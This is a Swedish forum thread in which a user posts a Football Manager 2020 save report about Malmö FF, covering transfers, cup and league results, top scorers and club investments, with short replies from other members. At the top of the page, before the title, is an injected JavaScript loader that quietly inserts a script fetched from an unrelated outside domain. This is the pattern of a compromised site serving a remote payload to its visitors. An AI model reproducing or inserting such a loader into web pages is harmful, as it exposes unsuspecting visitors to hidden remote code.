;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Livet efter Markus Rosenberg – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Stängt] [FM20] Livet efter Markus Rosenberg

110 Inlägg
23 Users
344 Reactions
7,510 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Som många av er vet vid det här laget så älskar jag att skriva och vad passar inte bättre med en saverapport? Efter att John Dahl Tomasson tog över Malmö FF fick vi en intention om att klubben ville börja hitta tillbaka till sin himmelsblåa filosofi; att värna om akademispelarna och på sikt utveckla dem och tjäna pengar i form av försäljningar. I samband med det är ambitionen varje år att vinna Allsvenskan och ta sig ut till Europa vilket är lättare sagt än gjort. Den här utmaningen passar därför mig som handen i handsken dels på grund av den filosofiska utmaningen men även att det är en av mina absoluta favoritklubbar.

Malmö FF har ett otroligt bra lag men ålderstiget och min inledande uppgift blir därför att försöka mjölka ur det sista ur de äldre spelarna och fasa in de yngre blandat med nyförvärv som antingen kommer ge oss en ekonomisk skjuts ur ett längre perspektiv eller som direkt kan gå in och göra skillnad. Vi vet om att vi inte är och rör oss på den översta hyllan på transfermarknaden och att svensk fotboll inte är högt ansedd, men nånstans så har klubben en otroligt god ekonomi sett till de allsvenska konkurrenterna vilket ger oss en bra grund men även att vi möjligtvis kan göra en och annan spännande värvning.

Jag har en tanke kring rapporteringsupplägget men är inte helt överens med mig själv än. Det finns en hel del intressanta upplägg i de andra rapporterna här på forumet, något jag gärna ser över och kanske lånar av. Men jag kommer att försöka hålla inläggen kortfattade men informativa, något jag har gjort mycket förr. Kommentera och gilla gärna, jag gillar att interagera med er läsare. Nu kör vi!


   
Forza Rossoneri, Micke, Phansell and 12 people reacted
Karamellkungen
(@casper)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Grymt! som himmelsblå själv ser jag fram emot att följa denna resa!
Framåt Malmö!

Maratontabellen


   
Phogge
(@phogge)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

Alltid kul med svenska lag. 

Hoppas du kan hålla det någorlunda realistiskt så det inte värvas för sjuka summor direkt. 

Lycka till! 


   
(@ocarne)
Active Member
Blev medlem: 4 år sedan
Inlägg: 11
 

Spännande längtar redan tills nästa gång 


   
ottobayor
(@ottobayor)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

All lycka Danne. Framåt Malmö! ⭐⭐??


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Som ett första drag anställdes en hel del personal, inte minst till rekryteringsgruppen. Malmö gick från en scout till sju och därefter skickades de ut på uppdrag att hitta en passande högerback bakom Eric Larsson, numret yngre. Samtidigt letade vi talanger under 19 år med klubbtillhörighet i Götaland för att ta in dem i rätt tid och således göra dem till egna produkter. Götaland känns som ett geografiskt närområde att leta svenska talanger i och det slutade med en värvning av Landskrona BoIS högerfotade vänstermittfältare Kevin Jensen. Samma dag skrev även högerbacken Johan Stenmark på för Himmelsblått och A-laget var nu komplett tack vare att egna produkten Hugo Andersson blev uppflyttad för att bredda mittbacksuppsättningen.

IN
hb :: Johan Stenmark :: 7,75M :: Kalmar FF
omv :: Kevin Jensen :: 0,28M
 :: Landskrona BoIS

UT
fw :: Amin Sarr :: Lån :: Lunds BK
vb :: Yahya Kalley :: Lån :: Lunds BK
omv :: Pavle Vagic :: Lån :: GIF Sundsvall
fw :: Tim Prica
 :: Lån + 3,5M :: Kalmar FF
cm :: Bonke Innocent :: Lån :: BK Häcken
mb :: Henrik Rossborg :: Fri Transfer
 :: Halmstads BK

Vi slöt dessutom ett samarbetsavtal med Division 1-klubben Lunds BK och för er som inte vet så ligger städerna Malmö och Lund otroligt nära varandra, endast 16 kilometer från varandra sett till fågelvägen. Ett perfekt geografiskt nära samarbete. Amin Sarr och Yahya Kalley gjorde redan utlånade Mathias Nilsson sällskap i skåneklubben. Utöver det lånades talangerna Pavle Vagic och Tim Prica ut till GIF Sundsvall respektive Kalmar FF. BK Häcken kom vid slutskedet av transferfönstret och erbjöd att betala 90% av lönen plus totalt 3,5 miljoner kronor för att låna in vårt tredjeval, bakom Bachirou och Lewicki, Innocent vilket var helt okej för oss. Henrik Rossborg ansågs inte ha potentialen att nå A-laget och gick till Halmstad på en fri transfer.

Svenska Cupen
Gruppspel :: B :: Halmstads BK :: 4-0
Gruppspel :: H :: AIK :: 4-1
Gruppspel :: B :: Örebro SK :: 2-2
Kvartsfinal :: B :: Hammarby IF :: 1-0
Semifinal :: B :: BK Häcken :: 0-1

Bäste målskytt :: Ola Toivonen :: 4 st
Bästa framspelare :: Anders Christiansen :: 4 st

Och så var det dags för Svenska Cupen, en titel Malmö FF inte bärgat sedan 1989. Efter en imponerande inledning med 4-0 mot HBK samt 4-1 mot AIK så hände något. Örebro tog poäng mot en formstark himmelsblå elva och en jobbig magkänsla dök upp. Även om vi vann mot Bajen i kvartsfinalen så kändes det återigen inte bra och i semifinalen kom det vi oroat oss för; förlusten och därmed uttåget ur cupen. Cupspöket lever vidare och vi har onekligen en hel del att jobba vidare med inför seriepremiären om ett par veckor.


   
Micke and Phansell reacted
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

Ser fram emot mer från dig! 🙂


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Halva, nåväl, säsongen är färdigspelad och Allsvenskan tar ett uppehåll eftersom det nu är dags för Europamästerskapet. Sverige fick en ohyggligt svår grupp där de ställs mot Belgien, Italien och Kroatien och för Malmös del så har vi tre representanter med i turneringen där Jonas Knudsen och Anders Christiansen spelar för Danmark och Arnór Ingvi Traustason spelar för Island. I Allsvenskan har det gått över förväntan sett till hur vi spelade i Svenska Cupen men likväl så finns det frågetecken att försöka reda ut under sommaruppehållet. Vi har trots allt vunnit samtliga 13 matcher och Isaac Kiese Thelin delar skytteligaledningen med Häckens Alexander Söderlund, men någonstans så känns det inte 100%.

Det har varit mycket 2-0 vinster eller till och med uddamålsvinster men samtidigt har vi hållit nollan nio av 13 matcher och gjort allra flest mål, 31 stycken, och därför så känns det bara konstigt eftersom spelet inte ser bra ut. Hur som helst så har vi en bra grund att luta oss tillbaka på nu när det är dags att försöka kvalificera oss in till Europa League dessutom, det vore konstigt om vi inte började tappa poäng snart. Utöver det så har en del spelare börjat klaga på speltid där mittbacken Lasse Nielsen förmodligen har gjort sitt i klubben. Franz Brorsson är på väg tillbaka från sitt lån och alla andra mittbackar är tillfredsställda med sin situation.

Bäste målskytt :: Isaac Kiese Thelin :: 7 st
Bästa framspelare :: Ola Toivonen :: 5 st
Högst snittbetyg :: Anders Christiansen :: 7,77

Som bekant leder IKT skytteligan tillsammans med Häckens Alexander Söderlund. Ola Toivonen ligger en assist bakom toppen och Anders Christiansen är hela Allsvenskans bästa spelare sett till snittbetyg. Jag vill dock få ut mer poäng från en rad spelare, bland annat AC men även Sören Rieks, men jag vill samtidigt slå ett slag för Anel Ahmedhodzic som tillsammans med Rasmus Bengtsson varit otroligt kompakta och fenomenala i backlinjen. Det är dessutom kul att se hur bra Hugo Andersson spelat när han väl fått chansen.


   
Phansell reacted
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Kul att följa 🙂 Funderar på att dra gång någon saverapport själv också 🙂 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
JS7 and Daniel Nilsson reacted
Pontus Wernbloom
(@pontus-wernbloom)
Eminent Member Admin
Blev medlem: 4 år sedan
Inlägg: 32
 

@phansell Kör! någon gång ska va den första!

 

PW


   
Micke, JS7 and Phansell reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Sommarfönstret har passerat sitt slutdatum och det är dags att redovisa vad som har hänt mellan 15 juli och 11 augusti. Under våren gav jag rekryteringsgruppen i uppgift att leta nyförvärv i såväl Götaland som i de nordiska länderna men även nordiska spelare ute i Europa. Det landade på hela 162 spelare och det handlade delvis om att finna potentiella ersättare till varje position ifall någon spelare skulle försvinna men även för framtiden. En handfull spelare rekommenderades extra vilket landade i två nyförvärv. Mjällbys målvaktstalang Noel Törnqvist och Vikings mittfältstalang Sondre Auklend anlände för 50 000 respektive 20 000 kronor.

IN
mål :: Noel Törnqvist :: 0,05M :: Mjällby AIF
cm :: Sondre Auklend :: 0,02M :: Viking FK

UT
mb :: Lasse Nielsen :: 8M :: Inter Miami
mål :: Dusan Melicharek :: 0kr :: Boby Brno
cm :: Samuel Adrian :: Lån :: Lunds BK
mb :: Johan Rapp :: Lån :: Lunds BK
mb :: Linus Borgström :: Lån :: Lunds BK
omv :: Kevin Jensen :: Lån :: Trelleborgs FF
cm :: David Edvardsson :: Lån :: Trelleborgs FF
cm :: Amel Mujanic :: Lån :: Trelleborgs FF
mål :: Lamin Sarr :: Lån :: Trelleborgs FF
mb :: Noah Eile :: Lån :: Trelleborgs FF
hb :: Albin Sundgren :: Lån :: Trelleborgs FF

Rutinerade mittbacken Lasse Nielsen var inte speciellt nöjd med sin speltid under våren och lämnade för spel i David Beckhams Inter Miami. Reservmålvakten Dusan Melichareks kontrakt löper ut efter säsongen och när hans före detta klubb Boby Brno i den tjeckiska andradivisionen hörde av sig togs det snabba och ömsesidiga beslut om en övergång. Utöver det så har Trelleborgs FF i Superettan gått med på att återuppta kontakten och godkände ett samarbetsavtal vilket ledde till att inte mindre än sex spelare lånades ut till dem, däribland Kevin Jensen och Amel Mujanic. Ytterligare tre spelare lånades dessutom ut till vår andra samarbetsklubb, Lunds BK. Detta ledde till att endast fyra spelare fanns kvar i reservtruppen och de flyttades alla upp till A-laget för resten av säsongen, vilka var Sebastian Nanasi, Sondre Auklend, Noel Törnqvist samt Isak Bjerkebo.


   
Prev and Micke reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Första säsongen för John Dahl Tomasson slutade med succé då Malmö FF gick och vann Allsvenskan på ett mycket övertygande sätt. 25 vinster, fem oavgjorda samt en förlust vilket resulterade i rekordhöga 79 poäng. Dessutom smällde man in 79 mål och släppte endast in 14 stycken. Tyvärr så lottades vi mot tyska storklubben Leverkusen i den sista och avgörande kvalomgången till Europa League-gruppspelet och som väntat förlorade vi kampen över två matcher även om vi bjöd upp till dans. Till nästa säsong kommer vi att försöka kvala in till Champions League och då gäller det att vi står redo på ett bättre sätt inför liknande matcher.

Eftersom vi fick in så många mål så var det heller inte konstigt att en av våra egna spelare, nämligen anfallaren Isaac Kiese Thelin, vinner skytteligan. 16 mål vilket var fem fler än tre spelare som slutade på andra plats. Anders Christiansen höll en otroligt hög nivå säsongen rakt igenom och lyckades vinna såväl assistligan som inneha högst snittbetyg i hela Allsvenskan. Bakom dessa två spelare vill jag även lyfta bland andra Traustason, Bachirou, Knudsen, Toivonen och Ahmedhodzic som alla stått för kvalitativa insatser mer eller mindre hela säsongen.

Bäste målskytt :: Isaac Kiese Thelin :: 16 st
Bästa framspelare :: Anders Christiansen :: 14 st
Högst snittbetyg :: Anders Christiansen :: 7,82

Ända sedan försäsongen har jag haft många diskussioner med Malmö FF’s styrelse vilket till slut mynnade ut i en hel del beslut. Tre nya samarbetsklubbar fick vi i Lunds BK, Trelleborgs FF och nyligen kom vi även överens med japanska Nagoya Stolz om ett ekonomiskt samarbetsavtal som kommer att gynna båda parter. Vår försäsong nästa år kommer även att ske i Japan. Utöver detta så ska såväl ungdoms- som seniorfaciliteter uppgraderas, dataanalyscentret har uppgraderats vid två tillfällen och det blev precis klart att Stadion ska utökas med hela 11 000 platser. Det har och kommer att kosta mycket pengar men ur ett längre perspektiv kommer detta gynna såväl spelare som klubben otroligt mycket.


   
raca14, V1lhelm and Micke reacted
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Imponerande facit! Hoppas på bättre lycka i Europa nästa säsong.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Inför säsongen fanns där en del positioner som behövde förstärkas. Det handlade om att dåvarande spelare inte levererat samtidigt som vi ville föryngra truppen. När såväl Nils Fröling som Rasmus Wiedesheim-Paul chockerande nog transferlistades av sina respektive klubbar så gick det inte lång tid förrän båda spelarna tillhörde Malmö FF. Samarbetsklubben Lunds BK lyckades få fram en ung och intressant anfallstalang i Fredrik Bengtsson som vi tog in för att vidareutveckla i vårt juniorlag. I sluttampen av transferfönstret fick vi loss Daleho Irandust i en deal som gör att vi köper honom för 10 miljoner kronor men där han kommer att spela kvar i Häcken åtminstone fram tills sommaren, något man omöjligen tacka nej till. Han ses som en ersättare till Ola Toivonen. Tyvärr ville Isaac Kiese Thelin inte diskutera kontrakt när vi aktiverade 16-miljonersklausulen på honom.

IN
fw :: Fredrik Bengtsson :: 0,2M :: Lunds BK
fw :: Nils Fröling :: 17M :: Kalmar FF
omv :: Rasmus Wiedesheim-Paul :: 14M :: Halmstads BK
omc :: Daleho Irandust :: 10M :: BK Häcken

UT
omv :: Sören Rieks :: 3M :: Renhe
mh :: Romain Gall :: 7M :: Changchun
mb :: Anel Ahmedhodzic :: 70M :: Brighton
cm :: Samuel Adrian :: Fri Transfer:: Falkenbergs FF
fw :: Tim Prica :: Lån :: Kalmar FF
omv :: Kevin Jensen :: Lån :: GIF Sundsvall
omc :: Daleho Irandust :: Lån :: BK Häcken
mål :: Noel Törnqvist :: Lån :: Lunds BK
mål :: Mathias Nilsson :: Lån :: Trelleborgs FF
fw :: Amin Sarr :: Lån :: Trelleborgs FF
mb :: Johan Rapp :: Lån :: Trelleborgs FF
omc :: Sondre Auklend :: Lån :: Trelleborgs FF
omv :: Patriot Sejdiu :: Lån :: Mjällby AIF
cm :: David Edvardsson :: Lån :: IK Sirius
mål :: Marko Johansson :: Lån :: Mjällby AIF
dm :: Bonke Innocent :: Lån :: BK Häcken
cm :: Pavle Vagic :: Lån :: GIF Sundsvall

Sören Rieks kom inte alls igång förra säsongen och var mestadels en besvikelse när han väl spelade. När han listades kom ett par kinesiska men även danska klubbar och hörde av sig om möjligheten att värva honom och det landade till slut i kinesiska Renhe. Även Romain Gall, tidigare utlånad till Stabaek i Norge, lämnade för spel i Kina. Vår mittbackstalang Anel Ahmedhodzic lyckades prestera så pass bra att Brighton såg honom som sitt stora transfermål under januari månad. 70 miljoner kronor plus 50% av nästa försäljning känns som en riktigt bra deal både kortsiktigt men även långsiktigt. Samuel Adrian lämnade på en fri transfer medan Tim Prica, Marko Johansson, Bonke Innocent och Pavle Vagic på nytt lånades ut till de klubbar de tillhörde förra säsongen. I övrigt skedde ytterligare lån för att ge talangerna speltid i en seniormiljö.

Svenska Cupen
Gruppspel :: B :: Kalmar FF :: 5-0
Gruppspel :: H :: Västerås SK :: 4-0
Gruppspel :: B :: Eskilsminne IF :: 3-0
Kvartsfinal :: H :: BK Häcken :: 3-2
Semifinal :: H :: AIK :: 1-0

Flest mål :: Nils Fröling :: 4 st
Flest assist :: Anders Christiansen :: 3 st

Det gick betydligt bättre under den här upplagan av Svenska Cupen. Vi inleder med en fantastisk insats mot Kalmar FF där nyförvärvet från just Kalmar, Nils Fröling, slår till med ett superbt hattrick och en assist. Därefter fick vi se ett mer reservbetonat Malmö FF spela mot både Västerås och Eskilsminne innan en mer ordinarie elva mönstrade mot Häcken och sedermera AIK. I finalen ställs vi mot IFK Göteborg som hemmaslog Djurgårdens IF i den andra semifinalen.


   
raca14 and Northwinds reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

12 matcher i Allsvenskan och en cupfinal, så såg vårsäsongen ut vilket totalt var lika många matcher efter samma period förra året. Den här gången är vi inte lika överlägsna sett till poäng men vi är snarlika sett till mål framåt och bakåt. Samtliga tre poängförluster i Allsvenskan har kommit på bortaplan; 0-0 borta mot Sundsvall, 0-0 borta mot Elfsborg samt 0-1 borta mot Hammarby. I Svenska Cupen lyckades vi till slut vinna finalen mot Blåvitt efter att matchen gick hela vägen till förlängning.

Förra säsongens målkung Kiese Thelin är inte kvar utan nyförvärvet Fröling har fått konkurrera med Molins om startplatsen, med en något modifierad anfallsroll jämte förra året. Dock har det varit Marcus Antonssons år hittills med sina fem fullträffar i Allsvenskan. Än så länge så finns det inga riktiga utpekade poängspelare som sticker ut ur mängden men samtidigt så gör vi jobbet. Nyförvärven och uppflyttade Eile har presterat på en bra nivå vilket resten av spelarna också har gjort.

Flest mål :: Marcus Antonsson :: 5 st
Flest assist :: Eric Larsson / Arnór Traustason :: 3 st
Högst snittbetyg :: Jonas Knudsen :: 7,61

Det är dessutom väldigt roligt att följa de utlånade spelarnas framfart i sina respektive klubbar. Tim Prica har svarat för 7 mål på 12 matcher i Kalmar, David Edvardsson 3 assist på 11 matcher i Sirius samtidigt som Daleho Irandust gjort 2 mål och 4 assist i Häcken. Lunds BK krigar på och försöker hålla sig på rätt sida om strecket medan Trelleborg fortsätter att vara ett lag precis bakom toppen. Våra utlånade spelare gör skillnad.


   
Micke and raca14 reacted
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Återigen dags för ett sommarfönster och den här gången handlade det om att ta tillvara på formtoppade spelare som för tillfället var utlånade. Daleho Irandust och Tim Prica är spelarna som leder assistligan kontra skytteligan i Allsvenskan och det vore en näst intill kriminell handling om jag inte hämtade hem dem nu när vi ska försöka kvalificera oss in till Champions League till hösten. Det ger en stor konkurrens i truppen samtidigt som Ola Toivonen och Guillermo Molins är inne på sista fiolen i klubben.

IN
omc :: Daleho Irandust :: Tillbaka från lån :: BK Häcken
fw :: Tim Prica :: Tillbaka från lån :: Kalmar FF

UT
fw :: Isak Bjerkebo :: Lån :: Trelleborgs FF
hm :: Sebastian Nanasi :: Lån :: Trelleborgs FF
hb :: Johan Stenmark :: 90M :: Watford

Behovet av att släppa iväg spelare fanns inte eftersom vi var väldigt aktiva under vinterfönstret men Isak Bjerkebo och Sebastian Nanasi gick äntligen med på att lånas ut till Trelleborg för att förhoppningsvis kunna ta nästa steg i utvecklingen. I sluttampen av fönstret dök Watford upp med ett oerhört intresse för vår högerback Johan Stenmark. Efter en viss tids förhandling lämnade vår reservhögerback för spel i England för inte mindre än 90 miljoner kronor och 50% av nästa försäljning vilket får ses som en bättre deal än vad AIK fick för Alexander Isak. Unge Albin Sundgren flyttas därmed upp för att ge konkurrens till Eric Larsson.


   
Micke and raca14 reacted
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
 

Superbra rapport som vanligt! funderar själv på en allsvensk klubb 🙂


   
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Vart tog Kiese vägen?


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  
Postad av: @jimpacool

Vart tog Kiese vägen?

Lånet från Anderlecht löpte ut. Vi hade en klausul på 16M men han var helt enkelt inte intresserad, något jag skrev om också. Han agerar inhoppare i den belgiska klubben och svarade för tre mål på fem matcher den gångna säsongen.


   
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Säsong nummer två är tagen till historieböckerna och det var onekligen ett trappsteg upp för Malmö FF. Vi vann Allsvenskan för andra året på raken, Svenska Cupen bärgades, vi missade tyvärr att ta oss till gruppspel i Champions League då vi helt rättvist förlorade på mållinjen mot Celtic men där vi istället gick till gruppspel Europa League. Väl där ställdes vi mot Sevilla, Marseille och Rosenborg vilket talade för en av de tuffare grupperna i årets upplaga av EL. Men vi lyckades ändå, inledningsvis via oavgjorda men sedermera via vinster, till slutspelet av EL tillsammans med Marseille vilket kommer att ge klubben en skjuts i såväl pengar som rankning.

Vi genomför en identisk säsong i Allsvenskan sett till V-O-F och därmed poäng(79), men vad som skiljer sig är att vi gör fyra fler mål men släpper även in ett mål mer. Vi måste dock ha med i beräkningen att vi, till skillnad från föregående säsong, hade sex matcher i Europa League. Det var således svårt att hitta en riktig form på individuella spelare eftersom vi fick rotera en hel del men det var verkligen viktigt att såväl Prica som Irandust tillkom under sommaren. Just Prica kom tvåa i skytteligan tillsammans med Marcus Antonsson med vardera tolv mål, två mål bakom skytteligavinnaren Gustaf Nilsson i BK Häcken. Daleho Irandust delade assistligavinsten med Blåvitts Hosam Aiesh på elva framspelningar medan Anders Christiansen kom tvåa i snittbetygsligan bakom AIK’s Sebastian Larsson. Och som vanligt vill jag även passa på att göra en shoutout till Noah Eile, Erdal Rakip, Hugo Andersson, Jonas Knudsen och Rasmus Wiedesheim-Paul som alla gjort otroligt bra ifrån sig den här säsongen.

Flest mål :: Tim Prica & Marcus Antonsson :: 12 st
Flest assist :: Daleho Irandust :: 11 st
Högst snittbetyg :: Anders Christiansen :: 7,56

Faciliteterna har fortsatt uppgraderats, arenan är snart också den färdiguppgraderad och vi har fått en hel del nya samarbetsklubbar. Förutom Lunds BK, Trelleborgs FF och japanska Nagoya Stolz har vi nu knutit till samarbete med australiensiska Melbourne Knights, amerikanska Sacramento och nu senast engelska League 1-klubben Barnsley. Är det inte ekonomiskt vinnande samarbeten så handlar det om lånesamarbeten. Med andra ord är vi en klubb som verkligen utvecklas på flera, om inte alla, plan samtidigt för att ur ett längre perspektiv bli en otroligt slagkraftig klubb på alla sätt och vis.


   
Sida 1 / 6
Share: